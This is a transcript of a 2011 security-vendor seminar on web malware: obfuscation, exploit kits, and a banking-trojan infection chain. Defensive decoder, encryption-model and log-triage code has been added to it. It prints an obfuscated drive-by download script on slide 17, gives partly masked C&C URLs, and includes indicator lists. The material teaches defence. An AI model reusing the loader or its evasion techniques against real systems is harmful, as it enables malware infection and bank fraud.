Protect critical infrastructure by Patrick de Jong

Seminar by Patrick de Jong during Infosecurity.be 2011


  1. Protecting your critical infrastructure against web threats. Patrick de Jong, Sales Engineer, Northern Europe
  2. Agenda:
     • Critical infrastructure / web threats relation
     • What are we facing (some statistics) and why
     • Spreading the malware
     • How do ‘they’ stay undetected?
     • What harm can ‘they’ do?
     • An example (Phoenix + Banker trojan)
     • The message of the photo (opening slide)
  3. Critical infrastructure and web threats? Then: proprietary boxes with push buttons and switches, without any networking or connectivity (later with a proprietary OS and proprietary networks). Now: ‘everything’ got connected, with digitized (remote) control based on standard operating systems like Windows or Linux and using standard Ethernet and TCP/IP.
  4. Critical infrastructure – Web threats
  5. Some statistics (what are we facing): web-based threats
     • 92% of new threats come from the Web
     • 671% increase in Web malware over 2008
     • 79.9% of Web malware is hosted on legitimate sites
     • AV-Test currently (January 2011) counts 50 million malware samples
     Source: Websense
  6. Some statistics (what are we facing): the Web 2.0 landscape (collaboration tools, social networking, enterprise SaaS, social media, media sharing, interactive applications, client sharing, mass communications, world-wide)
     • Current AV catch rates: under 40%*
     • 52% of malware is dead within 24 hours**
     • 10 billion blended-threat emails per day*
     *Source: M86 Security Labs  **Source: Panda Labs
  7. Why? Driven by money. Just as professional as commercial software
  8. Why? Driven by money. Joint-venture toolkits
  9. Why? Driven by money. Data selling
  10. Why? Mostly driven by money. Buying and selling ‘victims’
  11. Spreading the malware: email spam and malicious websites
  12. Spreading the malware: malware distribution via legitimate websites (stolen FTP credentials or a hack)
  13. Spreading the malware: malware distribution via legitimate websites (stolen FTP credentials or a hack)
     • The attacker benefits from someone else’s traffic and reputation
     • Designed to defeat URL filtering and reputation software
     • Most malware is now spread via compromised legitimate sites
  14. How ‘they’ stay undetected
  15. How they stay undetected: evasive techniques
  16. How they stay undetected: evasive techniques behind the scenes
  17. How they stay undetected: code obfuscation. The slide’s sample, with its two-column layout restored. Every string literal is stored reversed and is only turned back into code by RV() (reverse) or RE() (reverse, then eval) at run time, so a scanner looking at the file sees no recognisable text:

        var fname = "C:mssync20.exe";
        // RV() reverses its argument: the download URL, stored backwards
        var url = RV("1=edom?php.ssr/2ssr/moc.enilnolanosrep-vt.www//:ptth");
        RE("");
        // RE() reverses and eval()s: document.createElement(object);
        var _r = RE(";)tcejbo(tnemelEetaerc.tnemucod");
        // _r.setAttribute(id,_r);
        RE(";)r_,di(etubirttAtes.r_");
        // _r.setAttribute(classid,clsid:BD96C556-65A3-11D0-983A-00C04FC29E36);
        RE(";)63E92CF40C00-A389-0D11-3A56-655C69DB:dislc,dissalc(etubirttAtes.r_");
        var is_ok = 0;
        try {
          // _r.CreateObject(adodb.stream,);
          var _s = RE(";),maerts.bdoda(tcejbOetaerC.r_");
          is_ok = 1;
        } catch (e) {}
        if (is_ok != 1) {
          try {
            // fallback: new ActiveXObject(adodb.stream);
            var _s = RE(";)maerts.bdoda(tcejbOXevitcA wen");
            is_ok = 1;
          } catch (e) {}
        }
        function RE(s) { return eval(RV(s)); }
        function RV(s) {
          var rev = "";
          for (i = 0; i < s.length; i++) {
            rev = s.charAt(i) + rev;
          }
          return rev;
        }
  18. How they stay undetected: code obfuscation. The reversed malicious code: undetected! The ‘actual’ malicious code (the same script with its strings in clear): detected, by 7 out of 31 engines.
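A static decoder for the reversal trick on slides 17 and 18, as an added example that is not part of the presentation. It never executes the sample: the slide’s RV() is re-implemented as a plain string reversal and every RV("…")/RE("…") literal is rewritten in place, which is enough to recover the download URL, the clsid (BD96C556-65A3-11D0-983A-00C04FC29E36, the MDAC RDS.DataSpace control) and the ADODB.Stream calls. SAMPLE is a constructed extract of the slide’s script; the indicator strings are my choice, not a vendor’s signature set.

```javascript
// Static decoder for the reversed-string + eval() obfuscation on the slide.
// Added example, not code from the presentation. RV/RE are the slide's own
// wrapper names; SAMPLE is a constructed extract of the slide's script.

const SAMPLE = `
var url = RV("1=edom?php.ssr/2ssr/moc.enilnolanosrep-vt.www//:ptth");
var _r = RE(";)tcejbo(tnemelEetaerc.tnemucod");
RE(";)63E92CF40C00-A389-0D11-3A56-655C69DB:dislc,dissalc(etubirttAtes.r_");
try { var _s = RE(";),maerts.bdoda(tcejbOetaerC.r_"); } catch (e) {}
try { var _s = RE(";)maerts.bdoda(tcejbOXevitcA wen"); } catch (e) {}
`;

// The slide's RV() reverses its argument; reimplemented here so that nothing
// from the sample is ever eval()ed.
function reverse(s) {
  return s.split("").reverse().join("");
}

// One RV("...") or RE("...") call with a plain string literal argument.
const CALL = /\b(RE|RV)\("([^"]*)"\)/g;

// Every wrapped literal in the script, decoded, in source order.
function decodeCalls(src) {
  const out = [];
  for (const m of src.matchAll(CALL)) {
    out.push({ wrapper: m[1], decoded: reverse(m[2]) });
  }
  return out;
}

// Rewrite the script so the hidden code is readable in place: RV("x") becomes
// the plain string literal, RE("x") becomes the statement eval() would have run.
function deobfuscate(src) {
  return src.replace(CALL, (_, wrapper, lit) =>
    wrapper === "RV" ? JSON.stringify(reverse(lit)) : "/* eval */ " + reverse(lit)
  );
}

// Strings a content filter can match once the reversal is undone (my choice of
// indicators). None of them occur in the obfuscated text, which is the whole
// point of the trick and why the scanners on slide 18 saw nothing.
const INDICATORS = ["ActiveXObject", "adodb.stream", "createElement(object", "setAttribute(classid"];

function indicators(text) {
  return INDICATORS.filter(i => text.includes(i));
}
```

Run indicators() on the raw script and it finds nothing; run it on deobfuscate(SAMPLE) and all four hit. The same idea generalises to any wrapper whose transform is trivially invertible (reverse, charCode arithmetic, base64): identify the wrapper, re-implement its transform without eval, and rewrite the literals before scanning.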
  19. How they stay undetected: dynamic code obfuscation
  20. How they stay undetected: dynamic code obfuscation (continued)
  21. How they stay undetected: private exploit encryption. NeoSploit infection process:
     • <malicious IFRAME> …
     • Generating obfuscated JS
     • Generating a key and sending it to the server
     • Using the key to generate an encrypted script that is sent back to the client
     • The browser opens the encrypted script with the key and executes the JS code
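The exchange on slide 21 modelled end to end, as an added example that is not NeoSploit’s code: the cipher (XOR against a keystream from a small LCG) and the request format are stand-ins for whatever the kit really used, and the payload is a constructed, benign string that is only returned, never eval()ed. What the model does show is why a byte signature on the script fails (same payload, fresh key, different bytes every session) and what stays constant for a detector: the key leaving the client in the request, and the decrypt-and-eval stub in the landing page.

```javascript
// Model of per-session encrypted exploit delivery as described for NeoSploit.
// Added example, not NeoSploit code: the cipher, the request shape and the
// payload are all stand-ins chosen for this illustration.

// Keystream from a 32-bit LCG seeded with the session key. A stand-in, not a
// real cipher; it only has to make the bytes depend on the key.
function keystream(key, length) {
  let state = key >>> 0;
  const out = new Uint8Array(length);
  for (let i = 0; i < length; i++) {
    state = (Math.imul(state, 1664525) + 1013904223) >>> 0;
    out[i] = state >>> 24;
  }
  return out;
}

function xorBytes(bytes, key) {
  const ks = keystream(key, bytes.length);
  return bytes.map((b, i) => b ^ ks[i]);
}

// Client, step 3 on the slide: generate a fresh key and send it to the server.
// The key travelling in the clear is the invariant a network detector can key on.
function clientRequest() {
  const key = Math.floor(Math.random() * 0x100000000) >>> 0;
  return { key, request: `GET /exploit?k=${key.toString(16)}` };
}

// Server, step 4: encrypt the script under that session key and return it.
// PAYLOAD is constructed and benign; a real kit would ship the exploit here.
const PAYLOAD = "var marker = 'benign payload';";
function serverResponse(key) {
  const plain = new TextEncoder().encode(PAYLOAD);
  return Buffer.from(xorBytes(plain, key)).toString("base64");
}

// Client, step 5: decrypt with the key it generated. The real loader passes the
// result to eval(); this model only returns it.
function clientDecrypt(key, b64) {
  const ct = new Uint8Array(Buffer.from(b64, "base64"));
  return new TextDecoder().decode(xorBytes(ct, key));
}

// Two sessions, same payload: both decrypt correctly, but the bytes on the
// wire differ, so a signature written against one capture misses the next.
function demonstrate() {
  const a = clientRequest();
  const b = clientRequest();
  const ca = serverResponse(a.key);
  const cb = serverResponse(b.key);
  return {
    sameCiphertext: ca === cb,
    roundTripA: clientDecrypt(a.key, ca),
    roundTripB: clientDecrypt(b.key, cb),
  };
}
```

The practical consequence for defenders is the one the slide implies: content inspection has to happen after decryption, inside the browser or an instrumented sandbox, or it has to target the parts that do not change, which here are the key-bearing request and the small clear-text decryption stub.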
  22. Toolkits/Trojans/C&C: what can they do with it
  23. Toolkits/Trojans/C&C: what can they do with it (continued)
  24. Example: banking trojan. Money mules
  25. Example: banking trojan. Legitimate websites: video2mp3.net, msgdiscovery.com, everythingon.tv, …. Using stolen FTP accounts, the cyber gang managed to inject an IFRAME that leads to the Phoenix Exploit Kit into thousands of legitimate websites.
  26. Example: banking trojan. Infection: the user accesses one of the compromised legitimate websites (video2mp3.net, msgdiscovery.com, everythingon.tv, …); the website content contains a redirection to the Phoenix Exploit Kit; the user is redirected to Phoenix Exploit Kit 2.3 at http://fan******.net/.ph/5; the user’s PC is exploited and the payload is downloaded successfully.
  27. Example: banking trojan. Configuration: the malware downloads a configuration file from hxxp://uste*****.com.tr/Scripts/rd.bin. This configuration file contains the injection orders that will be used when the user accesses the bank.
  28. Example: banking trojan. Reporting to the C&C: before the Trojan accesses the Command & Control server it verifies that the user’s PC is connected to the internet (request to http://google.com/webhp). After a successful connection test, the bot reports the new installation to the C&C server at hxxp://195.***.**.147:3128/data/set.php. The gang doesn’t want to expose the main C&C to the world and uses the exploit-kit server as a proxy to the main C&C server.
  29. Example: banking trojan. Besides the banker Trojan, the server sends the user another piece of malware: fake AV. The gang operates in multiple vectors; using social engineering it tries to convince the user to buy the fake AV.
  30. Example: banking trojan. The Trojan holds until the user accesses the bank (the financial institution). It then adds a script, on the client side, to every page of the bank’s website. Of course the script is not located on the bank’s server; the user is redirected to the C&C to download it: hxxp://cheap********card.info/brap/bscript.js
  31. Example: banking trojan. From that point on the Trojan supervises all user activity with the bank. The moment the user tries to submit a transaction, the bot contacts the C&C and receives the full details of the new transaction that it is going to commit instead. The bot replaces the details in the transaction submit form and sends it to the bank’s server.
  32. Example: banking trojan. An example of a successful transaction generated by the Trojan to the money mule account.
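Proxy-log triage for the chain on slides 25 to 28, as an added example that is not from the presentation. The log lines are constructed: 203.0.113.10 (a documentation address) stands in for the check-in server, and example.* names stand in for the compromised site, the exploit-kit host and the configuration host, whose real names the slides mask. Only the request shapes come from the slides: the /.ph/<n> landing page, /Scripts/rd.bin, the google.com/webhp connectivity probe, and a bare-IP:3128/data/set.php check-in. A google.com/webhp hit on its own is ordinary traffic, so it is only reported when the same client reaches the check-in within 60 seconds of it.

```javascript
// Proxy-log triage for the infection chain on slides 25-28. Added example,
// not from the presentation; LOG is constructed with placeholder hosts.

const LOG = `
2011-03-14T09:12:01Z 10.1.1.23 GET http://compromised.example/index.html 200
2011-03-14T09:12:02Z 10.1.1.23 GET http://ek.example/.ph/5 200
2011-03-14T09:12:05Z 10.1.1.23 GET http://cfg.example/Scripts/rd.bin 200
2011-03-14T09:12:06Z 10.1.1.23 GET http://google.com/webhp 200
2011-03-14T09:12:07Z 10.1.1.23 POST http://203.0.113.10:3128/data/set.php 200
2011-03-14T09:15:40Z 10.1.1.40 GET http://google.com/webhp 200
2011-03-14T09:20:00Z 10.1.1.40 GET http://www.example.org/ 200
`;

const IPV4_HOST = /^\d{1,3}(\.\d{1,3}){3}$/;

// Classify one request URL against the stages on the slides; null if none match.
function classify(url) {
  const u = new URL(url);
  if (/^\/\.ph\/\d+$/.test(u.pathname)) return "exploit_kit_landing";
  if (u.pathname.endsWith("/Scripts/rd.bin")) return "config_download";
  if (u.hostname === "google.com" && u.pathname === "/webhp") return "connectivity_check";
  if (IPV4_HOST.test(u.hostname) && u.port === "3128" && u.pathname === "/data/set.php") {
    return "cnc_checkin";
  }
  return null;
}

// "timestamp client method url status" (constructed log format).
function parseLine(line) {
  const [ts, client, method, url, status] = line.trim().split(/\s+/);
  return { ts: Date.parse(ts), client, method, url, status };
}

// Correlate per client. The connectivity probe is remembered but only reported
// when a check-in from the same client follows it within 60 seconds.
function triage(log) {
  const perClient = {};
  const lastProbe = {};
  for (const raw of log.split("\n")) {
    if (!raw.trim()) continue;
    const r = parseLine(raw);
    const stage = classify(r.url);
    if (!stage) continue;
    if (stage === "connectivity_check") {
      lastProbe[r.client] = r;
      continue;
    }
    const hits = perClient[r.client] || (perClient[r.client] = []);
    if (stage === "cnc_checkin") {
      const probe = lastProbe[r.client];
      if (probe && r.ts - probe.ts <= 60000) {
        hits.push({ stage: "connectivity_check", url: probe.url });
      }
    }
    hits.push({ stage, url: r.url });
  }
  return perClient;
}

// A check-in means the payload ran; earlier stages alone mean the exploit may
// have failed, which still deserves a look at the client.
function verdict(hits) {
  if (!hits || hits.length === 0) return "clean";
  return hits.some(h => h.stage === "cnc_checkin") ? "infected" : "suspicious";
}
```

The path patterns are specific to this campaign and will rot; the durable part is the correlation: a well-known-site probe followed within seconds by a POST to a bare IP on a proxy port is characteristic of bot check-ins generally, and is cheap to alert on from proxy logs alone.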
  33. The photo
  34. Patrick de Jong, Sales Engineer Northern Europe. Phone: +31 33 454 3533. Mobile: +31 6 1373 2964. Email: patrick.dejong@m86security.com
